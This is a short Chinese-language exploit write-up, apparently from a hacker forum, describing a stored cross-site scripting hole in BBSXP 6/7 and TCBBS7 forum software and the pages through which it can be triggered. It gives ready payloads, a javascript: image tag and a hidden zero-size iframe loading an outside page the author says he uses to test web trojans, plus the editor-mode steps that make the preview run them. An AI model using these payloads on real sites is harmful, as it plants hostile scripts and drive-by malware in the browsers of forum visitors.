漏洞影响版本:
bbsxp6 bbsxp7 TCBBS7论坛
漏洞页面:
ShowPost.asp
漏洞利用页面:
NewTopic.asp (发表帖子)
ShowPost.asp (浏览帖子可以直接回复)
ReTopic.asp (回复帖子)
Blog.asp
EditPost.asp
admin_affiche.asp//这个需要admin的session,使用价值就不大了
利用过程:
发表新贴的时候,有三种编辑模式,设计、代码和预览。

选择“代码”,输入跨站内容,如 <IMG src="javascript:alert('guiguke@cnxhacker.net');">
或
<IFRAME src=" http://www.inbreak.net/kxlzx1.htm" frameBorder=0 width=0 height=0></IFRAME>
然后选择“设计”,点回复。

Bbsxp在回复帖子的时候,会自动预览一下。在http://www.inbreak.net/kxlzx1.htm 这个地址,是一个统计系统,是我专用来测试网马的,在选择设计的时候,已经访问了一下。
回复后,打开帖子。下面是访问纪录

[1] [2] 下一页